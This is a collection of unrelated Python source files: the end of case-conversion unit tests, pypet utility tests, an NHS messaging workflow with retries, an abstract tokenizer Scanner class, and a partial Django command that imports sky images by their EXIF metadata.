"separate_words": {
"camel": "foo Bar String",
"pascal": "Foo Bar String",
"const": "FOO BAR STRING",
"default": "foo bar string",
},
"slash": {
"camel": "foo/Bar/String",
"pascal": "Foo/Bar/String",
"const": "FOO/BAR/STRING",
"default": "foo/bar/string",
},
"backslash": {
"camel": "foo\\Bar\\String",
"pascal": "Foo\\Bar\\String",
"const": "FOO\\BAR\\STRING",
"default": "foo\\bar\\string",
},
}
PRESERVE_VALUES_UNICODE = {
"separate_words": {
"camel": "fóo Bar String",
"pascal": "Fóo Bar String",
"const": "FÓO BAR STRING",
"default": "fóo bar string",
},
"slash": {
"camel": "fóo/Bar/String",
"pascal": "Fóo/Bar/String",
"const": "FÓO/BAR/STRING",
"default": "fóo/bar/string",
},
"backslash": {
"camel": "fóo\\Bar\\String",
"pascal": "Fóo\\Bar\\String",
"const": "FÓO\\BAR\\STRING",
"default": "fóo\\bar\\string",
},
}
PRESERVE_VALUES_SINGLE = {
"separate_words": {
"camel": "foo",
"pascal": "Foo",
"const": "FOO",
"default": "foo",
},
"slash": {"camel": "foo", "pascal": "Foo", "const": "FOO", "default": "foo",},
"backslash": {"camel": "foo", "pascal": "Foo", "const": "FOO", "default": "foo",},
}
PRESERVE_VALUES_SINGLE_UNICODE = {
"separate_words": {
"camel": "fóo",
"pascal": "Fóo",
"const": "FÓO",
"default": "fóo",
},
"slash": {"camel": "fóo", "pascal": "Fóo", "const": "FÓO", "default": "fóo",},
"backslash": {"camel": "fóo", "pascal": "Fóo", "const": "FÓO", "default": "fóo",},
}
PRESERVE_VALUES_ACRONYM = {
"separate_words": {
"camel": "foo HTTP Bar String",
"pascal": "Foo HTTP Bar String",
"const": "FOO HTTP BAR STRING",
"default": "foo http bar string",
},
"slash": {
"camel": "foo/HTTP/Bar/String",
"pascal": "Foo/HTTP/Bar/String",
"const": "FOO/HTTP/BAR/STRING",
"default": "foo/http/bar/string",
},
"backslash": {
"camel": "foo\\HTTP\\Bar\\String",
"pascal": "Foo\\HTTP\\Bar\\String",
"const": "FOO\\HTTP\\BAR\\STRING",
"default": "foo\\http\\bar\\string",
},
}
PRESERVE_VALUES_ACRONYM_UNICODE = {
"separate_words": {
"camel": "foo HÉÉP Bar String",
"pascal": "Foo HÉÉP Bar String",
"const": "FOO HÉÉP BAR STRING",
"default": "foo héép bar string",
},
"slash": {
"camel": "foo/HÉÉP/Bar/String",
"pascal": "Foo/HÉÉP/Bar/String",
"const": "FOO/HÉÉP/BAR/STRING",
"default": "foo/héép/bar/string",
},
"backslash": {
"camel": "foo\\HÉÉP\\Bar\\String",
"pascal": "Foo\\HÉÉP\\Bar\\String",
"const": "FOO\\HÉÉP\\BAR\\STRING",
"default": "foo\\héép\\bar\\string",
},
}
PRESERVE_VALUES_ACRONYM_SINGLE = {
"separate_words": {
"camel": "HTTP",
"pascal": "HTTP",
"const": "HTTP",
"default": "http",
},
"slash": {"camel": "HTTP", "pascal": "HTTP", "const": "HTTP", "default": "http",},
"backslash": {
"camel": "HTTP",
"pascal": "HTTP",
"const": "HTTP",
"default": "http",
},
}
CAPITAL_CASES = [
"camel",
"pascal",
"const",
"const",
]
def _expand_values(values):
test_params = []
for case in CASES:
test_params.extend(
[
(name + "2" + case, case, value, values[case])
for name, value in values.items()
]
)
test_params.append((case + "_empty", case, "", ""))
return test_params
def _expand_values_preserve(preserve_values, values):
test_params = []
for case in CASES_PRESERVE:
test_params.extend(
[
(
name + "2" + case,
case,
value,
preserve_values[case][name if name in CAPITAL_CASES else "default"],
) # nopep8
for name, value in values.items()
]
)
test_params.append((case + "_empty", case, "", ""))
return test_params
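# For reference, _expand_values(VALUES) produces one parameterized case per
# (source, target) pair plus an empty-string case per target case, e.g.
# ("camel2snake", "snake", "fooBarString", "foo_bar_string") and
# ("snake_empty", "snake", "", "").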
class CaseConversionTest(TestCase):
@parameterized.expand(_expand_values(VALUES))
def test(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_UNICODE))
def test_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_SINGLE))
def test_single(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that
don't preserve capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_SINGLE_UNICODE))
def test_single_unicode(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that
don't preserve capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values_preserve(PRESERVE_VALUES, VALUES))
def test_preserve_case(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_UNICODE, VALUES_UNICODE)
)
def test_preserve_case_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_SINGLE, VALUES_SINGLE)
)
def test_preserve_case_single(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that do
preserve capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_SINGLE_UNICODE, VALUES_SINGLE_UNICODE)
)
def test_preserve_case_single_unicode(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that do
preserve capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_ACRONYM))
def test_acronyms(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with acronym detection).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS)
self.assertEqual(result, expected)
@parameterized.expand(_expand_values(VALUES_ACRONYM_UNICODE))
def test_acronyms_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with acronym detection and unicode
characters).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS_UNICODE)
self.assertEqual(result, expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_ACRONYM, VALUES_ACRONYM)
)
def test_acronyms_preserve_case(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with acronym detection).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS)
self.assertEqual(result, expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_ACRONYM_UNICODE, VALUES_ACRONYM_UNICODE)
)
def test_acronyms_preserve_case_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with acronym detection and unicode
characters).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS_UNICODE)
self.assertEqual(result, expected)
|
__author__ = 'Robert Meyer'
import time
import sys
import pickle
try:
from collections.abc import Set, Sequence, Mapping
except ImportError:
from collections import Set, Sequence, Mapping
import pandas as pd
import numpy as np
import random
import copy as cp
from pypet.tests.testutils.ioutils import run_suite, make_temp_dir, remove_data, \
get_root_logger, parse_args
from pypet.trajectory import Trajectory
from pypet.parameter import ArrayParameter, Parameter, SparseParameter, PickleParameter
import unittest
from pypet.utils.explore import cartesian_product, find_unique_points
from pypet.utils.helpful_functions import progressbar, nest_dictionary, flatten_dictionary, \
result_sort, get_matching_kwargs
from pypet.utils.comparisons import nested_equal
from pypet.utils.helpful_classes import IteratorChain
from pypet.utils.decorators import retry
from pypet import HasSlots
class RaisesNTypeErrors(object):
def __init__(self, n):
self.__name__ = RaisesNTypeErrors.__name__
self.n = n
self.retries = 0
def __call__(self):
if self.retries < self.n:
self.retries += 1
raise TypeError('Nope!')
class RetryTest(unittest.TestCase):
tags = 'unittest', 'utils', 'retry'
def test_fail_after_n_tries(self):
x = RaisesNTypeErrors(5)
x = retry(4, TypeError, 0.01, 'ERROR')(x)
with self.assertRaises(TypeError):
x()
def test_succeeds_after_retries(self):
x = RaisesNTypeErrors(5)
x = retry(5, TypeError, 0.01, 'ERROR')(x)
x()
class CartesianTest(unittest.TestCase):
tags = 'unittest', 'utils', 'cartesian_product'
def test_cartesian_product(self):
cartesian_dict=cartesian_product({'param1':[1,2,3], 'param2':[42.0, 52.5]},
('param1','param2'))
result_dict = {'param1':[1,1,2,2,3,3],'param2': [42.0,52.5,42.0,52.5,42.0,52.5]}
self.assertTrue(nested_equal(cartesian_dict,result_dict), '%s != %s' %
(str(cartesian_dict),str(result_dict)))
def test_cartesian_product_combined_params(self):
cartesian_dict=cartesian_product( {'param1': [42.0, 52.5], 'param2':['a', 'b'],\
'param3' : [1,2,3]}, (('param3',),('param1', 'param2')))
result_dict={'param3':[1,1,2,2,3,3],'param1' : [42.0,52.5,42.0,52.5,42.0,52.5],
'param2':['a','b','a','b','a','b']}
self.assertTrue(nested_equal(cartesian_dict,result_dict), '%s != %s' %
(str(cartesian_dict),str(result_dict)))
class ProgressBarTest(unittest.TestCase):
tags = 'unittest', 'utils', 'progress_bar'
def test_progressbar(self):
total = 55
percentage_step = 17
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, percentage_step)
def test_progressbar_w_wo_time(self):
total = 55
percentage_step = 17
shows_time = False
for irun in range(total):
time.sleep(0.005)
s = progressbar(irun, total, percentage_step, time=True)
if s and 'remaining' in s:
shows_time = True
self.assertTrue(shows_time)
shows_time = False
for irun in range(total):
time.sleep(0.005)
s = progressbar(irun, total, percentage_step, time=False)
if s and 'remaining' in s:
shows_time = True
self.assertFalse(shows_time)
def test_progressbar_resume(self):
total = 55
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, 5)
for irun in range(2*total):
time.sleep(0.005)
progressbar(irun, 2*total, 10)
def test_progressbar_float(self):
total = 55
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, 5.1)
for irun in range(2*total):
time.sleep(0.005)
progressbar(irun, 2*total, 0.5)
def test_progressbar_logging(self):
logger = get_root_logger()
total = 33
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, logger=logger)
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, logger='GetLogger')
class TestFindUnique(unittest.TestCase):
tags = 'unittest', 'utils', 'find_unique'
def test_find_unique(self):
paramA = Parameter('ggg', 33)
paramA._explore([1, 2, 1, 2, 1, 2])
paramB = Parameter('hhh', 'a')
paramB._explore(['a', 'a', 'a', 'a', 'b', 'b'])
unique_elements = find_unique_points([paramA, paramB])
self.assertTrue(len(unique_elements) == 4)
self.assertTrue(len(unique_elements[1][1]) == 2)
self.assertTrue(len(unique_elements[3][1]) == 1)
paramC = ArrayParameter('jjj', np.zeros((3,3)))
paramC._explore([np.ones((3,3)),
np.ones((3,3)),
np.ones(499),
np.ones((3,3)),
np.zeros((3,3,3)),
np.ones(1)])
unique_elements = find_unique_points([paramA, paramC])
self.assertTrue(len(unique_elements) == 5)
self.assertTrue(len(unique_elements[1][1]) == 2)
self.assertTrue(len(unique_elements[0][1]) == 1)
unique_elements = find_unique_points([paramC, paramB])
self.assertTrue((len(unique_elements))==4)
self.assertTrue(len(unique_elements[0][1])==3)
self.assertTrue(len(unique_elements[3][1])==1)
class TestDictionaryMethods(unittest.TestCase):
tags = 'unittest', 'utils'
def test_nest_dicitionary(self):
mydict = {'a.b.c' : 4, 'a.c' : 5, 'd':4}
nested = nest_dictionary(mydict, separator='.')
expected = {'a':{'b':{'c':4}, 'c':5}, 'd':4}
self.assertTrue(expected == nested)
def test_flatten_dictionary(self):
mydict = {'a':{'b':{'c':4}, 'c':5}, 'd':4}
flattened = flatten_dictionary(mydict, separator='.')
expected = {'a.b.c' : 4, 'a.c' : 5, 'd':4}
self.assertTrue(flattened == expected)
class ResultSortFuncTest(unittest.TestCase):
tags = 'unittest', 'utils', 'result_sort'
def result_sort_sorted(the_list, start_index=0):
to_sort = the_list[start_index:]
sorted_list = sorted(to_sort, key=lambda key: key[0])
for idx_count, elem in enumerate(sorted_list):
the_list[idx_count+start_index] = elem
return the_list
def test_sort(self, start_index=0, n=100):
to_sort = list(range(n)) # list for Python 3
random.shuffle(to_sort)
to_sort = [(x,x) for x in to_sort]
result_sort(to_sort, start_index)
if start_index == 0:
compare = [(x,x,) for x in range(n)]
else:
copy_to_sort = cp.deepcopy(to_sort)
compare = result_sort(copy_to_sort, start_index)
self.assertEqual(to_sort, compare)
if start_index != 0:
self.assertNotEqual(to_sort[:start_index], [(x,x,) for x in range(n)][:start_index])
def test_sort_with_index(self):
self.test_sort(500, 1000)
class MyDummy(object):
pass
class MyDummyWithSlots(object):
__slots__ = ('a', 'b')
class MyDummyWithSlots2(HasSlots):
__slots__ = ('a', 'b')
class MyDummyCMP(object):
def __init__(self, data):
self.data = data
def __cmp__(self, other):
if self.data == other.data:
return 0
elif self.data < other.data:
return -1
else:
return 1
class MyDummySet(Set):
def __init__(self, *args, **kwargs):
self._set = set(*args, **kwargs)
def __getattr__(self, item):
return getattr(self._set, item)
def __contains__(self, item):
return self._set.__contains__(item)
def __len__(self):
return self._set.__len__()
def __iter__(self):
return self._set.__iter__()
class MyDummyList(Sequence):
def __init__(self, *args, **kwargs):
self._list = list(*args, **kwargs)
def __len__(self):
return self._list.__len__()
def __getitem__(self, item):
return self._list.__getitem__(item)
def append(self, item):
return self._list.append(item)
class MyDummyMapping(Mapping):
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
def __getitem__(self, item):
return self._dict.__getitem__(item)
def __iter__(self):
return self._dict.__iter__()
def __len__(self):
return self._dict.__len__()
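# Because MyDummySet, MyDummyList and MyDummyMapping derive from the collections
# abstract base classes, implementing only the abstract methods above lets the
# ABC mixins supply the rest of the container behaviour (for example, Mapping
# contributes keys(), items(), get() and equality), which the nested_equal
# tests below exercise.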
class TestEqualityOperations(unittest.TestCase):
tags = 'unittest', 'utils', 'equality'
def test_nested_equal(self):
self.assertTrue(nested_equal(4, 4))
self.assertFalse(nested_equal(4, 5))
self.assertFalse(nested_equal(5, 4))
self.assertTrue(nested_equal(4, np.int8(4)))
self.assertTrue(nested_equal(np.int8(4), 4))
self.assertFalse(nested_equal(4, np.int8(5)))
self.assertFalse(nested_equal( np.int8(5), 4))
frameA = pd.DataFrame(data={'a':[np.zeros((19,19))]}, dtype=object)
frameB = pd.DataFrame(data={'a':[np.zeros((19,19))]}, dtype=object)
self.assertTrue(nested_equal(frameA, frameB))
self.assertTrue(nested_equal(frameB, frameA))
frameB.loc[0,'a'][0,0] = 3
self.assertFalse(nested_equal(frameA, frameB))
self.assertFalse(nested_equal(frameB, frameA))
seriesA = pd.Series(data=[[np.zeros((19,19))]], dtype=object)
seriesB = pd.Series(data=[[np.zeros((19,19))]], dtype=object)
self.assertTrue(nested_equal(seriesA, seriesB))
self.assertTrue(nested_equal(seriesB, seriesA))
seriesA.loc[0] = 777
self.assertFalse(nested_equal(seriesA, seriesB))
self.assertFalse(nested_equal(seriesB, seriesA))
seriesA = pd.Series([1,2,3])
seriesB = pd.Series([1,2,3])
self.assertTrue(nested_equal(seriesA, seriesB))
self.assertTrue(nested_equal(seriesB, seriesA))
a = MyDummy()
a.g = 4
b = MyDummy()
b.g = 4
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a.h = [1, 2, 42]
b.h = [1, 2, 43]
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyWithSlots()
a.a = 1
a.b = 2
b = MyDummyWithSlots2()
b.a = 1
b.b = 2
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummySet([1,2,3])
a.add(4)
b = MyDummySet([1,2,3,4])
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummyList([1,2,3])
a.append(4)
b = MyDummyList([1,2,3,4])
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummyMapping(a='b', c=42)
b = MyDummyMapping(a='b', c=42)
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummySet([1,2,3])
a.add(4)
b = MyDummySet([1,2,3,5])
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyList([1,2,3])
a.append(5)
b = MyDummyList([1,2,3,4])
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyMapping(a='b', c=a)
b = MyDummyMapping(a='b', c=b)
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyCMP(42)
b = MyDummyCMP(42)
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
b = MyDummyCMP(1)
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
self.assertFalse(nested_equal(a, 22))
self.assertFalse(nested_equal(22, a))
self.assertFalse(nested_equal(None, a))
self.assertFalse(nested_equal(a, None))
self.assertTrue(nested_equal(None, None))
class TestIteratorChain(unittest.TestCase):
tags = 'unittest', 'utils', 'iterators'
def test_next(self):
l1 = (x for x in range(3))
l2 = iter([3,4,5])
l3 = iter([6])
l4 = iter([7,8])
chain = IteratorChain(l1, l2, l3)
for irun in range(9):
element = next(chain)
self.assertEqual(irun, element)
if irun == 4:
chain.add(l4)
def test_iter(self):
l1 = (x for x in range(3))
l2 = iter([3,4,5])
l3 = iter([6])
l4 = iter([7,8])
chain = IteratorChain(l1, l2, l3)
count = 0
elem_list = []
for elem in chain:
self.assertEqual(elem, count)
count += 1
elem_list.append(elem)
if count == 3:
chain.add(l4)
self.assertEqual(len(elem_list), 9)
class Slots1(HasSlots):
__slots__ = 'hi'
class Slots2(Slots1):
__slots__ = ['ho']
class Slots3(Slots2):
__slots__ = ('hu', 'he')
class Slots4(Slots3):
__slots__ = ()
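# Slots1 through Slots4 build an inheritance chain that declares __slots__ as a
# plain string, a list, a tuple and an empty tuple respectively; HasSlots is
# expected to collect them all (plus __weakref__) into __all_slots__, which the
# tests below check both directly and after a pickle round-trip.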
class SlotsTest(unittest.TestCase):
tags = 'unittest', 'utils', 'slots'
def test_all_slots(self):
slot = Slots4()
all_slots = set(('hi', 'ho', 'hu', 'he', '__weakref__'))
self.assertEqual(all_slots, slot.__all_slots__)
def test_pickling(self):
slot = Slots4()
all_slots = set(('hi', 'ho', 'hu', 'he', '__weakref__'))
new_slot = pickle.loads(pickle.dumps(slot))
self.assertEqual(all_slots, new_slot.__all_slots__)
class MyCustomLeaf(SparseParameter):
def __init__(self, full_name, data=None, comment=''):
super(MyCustomLeaf, self).__init__(full_name, data, comment)
self.v_my_property = 42
class MyCustomLeaf2(PickleParameter):
__slots__ = 'v_my_property'
def __init__(self, full_name, data=None, comment=''):
super(MyCustomLeaf2, self).__init__(full_name, data, comment)
self.v_my_property = 42
class NamingSchemeTest(unittest.TestCase):
tags = 'unittest', 'utils', 'naming', 'slots'
def test_v_property(self):
cp = MyCustomLeaf('test')
self.assertEqual(cp.vars.my_property, cp.v_my_property)
with self.assertRaises(AttributeError):
cp.v_my_other
def test_v_property_slots(self):
cp = MyCustomLeaf2('test')
self.assertEqual(cp.vars.my_property, cp.v_my_property)
with self.assertRaises(AttributeError):
cp.v_my_other
class MyClass(object):
def __init__(self, a, b, c, d=42):
pass
class MyClassNoInit(object):
pass
def kwargs_func(a, b, c=43, *args, **kwargs):
pass
def argsfunc(a, b=42, *args):
pass
def dummy(a, b, c, d=42):
pass
class MatchingkwargsTest(unittest.TestCase):
tags = 'unittest', 'utils', 'naming', 'argspec'
def test_more_than_def(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(dummy, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_more_than_def_args(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(argsfunc, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_init_method(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(MyClass, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_no_match_no_init(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(MyClassNoInit, kwargs)
self.assertEqual(len(res), 0)
def test_kwargs(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(kwargs_func, kwargs)
self.assertEqual(len(res), 2)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
self.assertIn('f', res)
self.assertEqual(res['f'], 43)
if __name__ == '__main__':
opt_args = parse_args()
run_suite(**opt_args)
|
"""This module defines the asynchronous reliable workflow."""
import asyncio
import functools
from typing import Tuple, Optional, List, Dict
from xml.etree import ElementTree as ET
import utilities.integration_adaptors_logger as log
from comms import queue_adaptor
from isodate import isoerror
from tornado import httpclient
from utilities import timing
from utilities.date_utilities import DateUtilities
from mhs_common import workflow
from mhs_common.errors import ebxml_handler
from mhs_common.errors.soap_handler import handle_soap_error
from mhs_common.messages.ebxml_error_envelope import EbxmlErrorEnvelope
from mhs_common.messages.soap_fault_envelope import SOAPFault
from mhs_common.routing import routing_reliability
from persistence import persistence_adaptor
from mhs_common.state import work_description as wd
from mhs_common.transmission import transmission_adaptor
from mhs_common.workflow import common_asynchronous
logger = log.IntegrationAdaptorsLogger(__name__)
class AsynchronousReliableWorkflow(common_asynchronous.CommonAsynchronousWorkflow):
"""Handles the workflow for the asynchronous reliable messaging pattern."""
def __init__(self, party_key: str = None, persistence_store: persistence_adaptor.PersistenceAdaptor = None,
transmission: transmission_adaptor.TransmissionAdaptor = None,
queue_adaptor: queue_adaptor.QueueAdaptor = None,
max_request_size: int = None,
routing: routing_reliability.RoutingAndReliability = None):
super().__init__(party_key, persistence_store, transmission, queue_adaptor, max_request_size, routing)
self.workflow_specific_interaction_details = dict(duplicate_elimination=True,
ack_requested=True,
ack_soap_actor="urn:oasis:names:tc:ebxml-msg:actor:toPartyMSH",
sync_reply=True)
self.workflow_name = workflow.ASYNC_RELIABLE
@timing.time_function
async def handle_outbound_message(self, from_asid: Optional[str],
message_id: str, correlation_id: str, interaction_details: dict,
payload: str,
wdo: Optional[wd.WorkDescription]) \
-> Tuple[int, str, Optional[wd.WorkDescription]]:
logger.info('Entered async reliable workflow to handle outbound message')
wdo = await self._create_new_work_description_if_required(message_id, wdo, self.workflow_name)
logger.audit('Outbound {WorkflowName} workflow invoked.', fparams={'WorkflowName': self.workflow_name})
try:
details = await self._lookup_endpoint_details(interaction_details)
url = details[self.ENDPOINT_URL]
to_party_key = details[self.ENDPOINT_PARTY_KEY]
cpa_id = details[self.ENDPOINT_CPA_ID]
except Exception:
await wdo.set_outbound_status(wd.MessageStatus.OUTBOUND_MESSAGE_PREPARATION_FAILED)
return 500, 'Error obtaining outbound URL', None
reliability_details = await self._lookup_reliability_details(interaction_details)
retry_interval_xml_datetime = reliability_details[common_asynchronous.MHS_RETRY_INTERVAL]
try:
retry_interval = DateUtilities.convert_xml_date_time_format_to_seconds(retry_interval_xml_datetime)
except isoerror.ISO8601Error:
await wdo.set_outbound_status(wd.MessageStatus.OUTBOUND_MESSAGE_PREPARATION_FAILED)
return 500, 'Error when converting retry interval: {} to seconds'.format(retry_interval_xml_datetime), None
error, http_headers, message = await self._serialize_outbound_message(message_id, correlation_id,
interaction_details,
payload, wdo, to_party_key, cpa_id)
if error:
return error[0], error[1], None
return await self._make_outbound_request_with_retries_and_handle_response(url, http_headers, message, wdo,
reliability_details, retry_interval)
async def _make_outbound_request_with_retries_and_handle_response(self, url: str, http_headers: Dict[str, str],
message: str, wdo: wd.WorkDescription,
reliability_details: dict, retry_interval: float):
num_of_retries = int(reliability_details[common_asynchronous.MHS_RETRIES])
# retries_remaining is a mutable integer. This is done by putting an (immutable) integer into
# a mutable container.
retries_remaining = [num_of_retries]
handle_error_response = functools.partial(self._handle_error_response,
num_of_retries=num_of_retries, retries_remaining=retries_remaining)
while True:
try:
return await self._make_outbound_request_and_handle_response(url, http_headers, message, wdo,
handle_error_response)
except _NeedToRetryException:
retries_remaining[0] -= 1
logger.info("Waiting for {retry_interval} seconds before next request attempt.",
fparams={"retry_interval": retry_interval})
await asyncio.sleep(retry_interval)
continue
def _handle_error_response(self, response: httpclient.HTTPResponse, num_of_retries: int,
retries_remaining: List[int]):
try:
parsed_body = ET.fromstring(response.body)
if EbxmlErrorEnvelope.is_ebxml_error(parsed_body):
_, parsed_response = ebxml_handler.handle_ebxml_error(response.code,
response.headers,
response.body)
logger.warning('Received ebxml errors from Spine. {HTTPStatus} {Errors}',
fparams={'HTTPStatus': response.code, 'Errors': parsed_response})
elif SOAPFault.is_soap_fault(parsed_body):
_, parsed_response, soap_fault_codes = handle_soap_error(response.code,
response.headers,
response.body)
logger.warning('Received soap errors from Spine. {HTTPStatus} {Errors}',
fparams={'HTTPStatus': response.code, 'Errors': parsed_response})
if SOAPFault.is_soap_fault_retriable(soap_fault_codes):
logger.warning("A retriable error was encountered {error} {retries_remaining} {max_retries}",
fparams={
"error": parsed_response,
"retries_remaining": retries_remaining[0],
"max_retries": num_of_retries
})
if retries_remaining[0] <= 0:
# exceeded the number of retries so return the SOAP error response
logger.error("A request has exceeded the maximum number of retries, {max_retries} retries",
fparams={"max_retries": num_of_retries})
else:
raise _NeedToRetryException()
else:
logger.warning("Received an unexpected response from Spine", fparams={'HTTPStatus': response.code})
parsed_response = "Didn't get expected response from Spine"
except ET.ParseError:
logger.exception('Unable to parse response from Spine.')
parsed_response = 'Unable to handle response returned from Spine'
return 500, parsed_response, None
class _NeedToRetryException(Exception):
pass
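# Illustrative sketch (hypothetical names, not part of the original workflow):
# a minimal standalone demonstration of the mutable-counter pattern used in
# _make_outbound_request_with_retries_and_handle_response, where the retry
# budget lives in a one-element list so a functools.partial-bound handler can
# decrement it across calls.
def _demo_retry_counter(outcomes, max_retries=2):
    import functools
    def handler(outcome, retries_remaining):
        if outcome != 'ok' and retries_remaining[0] > 0:
            retries_remaining[0] -= 1
            raise _NeedToRetryException()
        return outcome
    retries_remaining = [max_retries]
    bound_handler = functools.partial(handler, retries_remaining=retries_remaining)
    for outcome in outcomes:
        try:
            return bound_handler(outcome)
        except _NeedToRetryException:
            continue
# _demo_retry_counter(['fail', 'fail', 'ok']) returns 'ok' after two retries.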
|
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
class Scanner(metaclass=ABCMeta):
EOF = None
def __init__(self, source):
self.source = source
self.cur_token = None
def current_token(self):
return self.cur_token
def next_token(self):
self.cur_token = self.extract_token()
return self.cur_token
@abstractmethod
def extract_token(self):
raise NotImplementedError()
def current_char(self):
return self.source.current_char()
def next_char(self):
return self.source.next_char()
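# Illustrative sketch (hypothetical subclass, not part of the original module):
# one possible concrete Scanner showing how extract_token() can be implemented.
# It assumes the wrapped source yields one character per current_char()/next_char()
# call and returns None once the input is exhausted.
class WordScanner(Scanner):
    """Tokenizes the source into whitespace-separated words."""
    def extract_token(self):
        ch = self.current_char()
        # Skip any leading whitespace.
        while ch is not None and ch.isspace():
            ch = self.next_char()
        if ch is None:
            return Scanner.EOF
        # Accumulate characters until whitespace or end of input.
        chars = []
        while ch is not None and not ch.isspace():
            chars.append(ch)
            ch = self.next_char()
        return ''.join(chars)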
|
from django.core.management.base import BaseCommand
from django.core.files import File
import os
import exifread
from data.models import SkyPicture, MeasuringDevice
import datetime
from fractions import Fraction
from data.tasks import gator, computeProjection
class Command(BaseCommand):
help = 'Import sky images stored in a user specified folder'
def add_arguments(self, parser):
parser.add_argument(
'--folder',
action = 'store',
dest = 'folder',
default = False,
help = 'Folder to read',
)
parser.add_argument(
'--device',
action = 'store',
dest = 'device',
default = False,
help = 'Name of the sky imager as stored in the database',
)
def handle(self, *args, **options):
        print(options)
        try:
            directory = options['folder']
            files_in_dir = os.listdir(directory)
        except Exception:
            print('Missing input file or unable to open')
            return
        try:
            print(options['device'])
            device = MeasuringDevice.objects.get(name=options['device'])
        except Exception:
            print('Missing or wrong device name')
return
for file_in_dir in files_in_dir:
if os.path.isdir(os.path.join(directory, file_in_dir)):
continue
if not file_in_dir.endswith(('JPG', 'jpg', 'jpeg')):
continue
            print('Current file: ' + file_in_dir)
# Create a new sky imager object, reading values from EXIF metadata
img = SkyPicture()
img.device = device
            try:
                f = open(os.path.join(directory, file_in_dir), 'rb')
                tags = exifread.process_file(f)
            except Exception:
                continue
if not 'EXIF ExposureTime' in tags or not 'EXIF FNumber' in tags or not 'EXIF ISOSpeedRatings' in tags or not 'EXIF DateTimeOriginal' in tags:
continue
            img.exposure_time = str(float(Fraction(str(tags['EXIF ExposureTime']))))
            print('Exposure time: ' + str(img.exposure_time))
            img.aperture_value = str(float(Fraction(str(tags['EXIF FNumber']))))
            print('Aperture value: ' + str(img.aperture_value))
            img.ISO_speed = int(str(tags['EXIF ISOSpeedRatings']))
            print('ISO speed: ' + str(img.ISO_speed))
            dt = datetime.datetime.strptime(str(tags['EXIF DateTimeOriginal']), "%Y:%m:%d %H:%M:%S")
            img.date = dt.date()
            print('Date: ' + str(img.date))
            img.time = dt.time()
            print('Time: ' + str(img.time))
            img.undistorted = "undistorted/TODO.png"
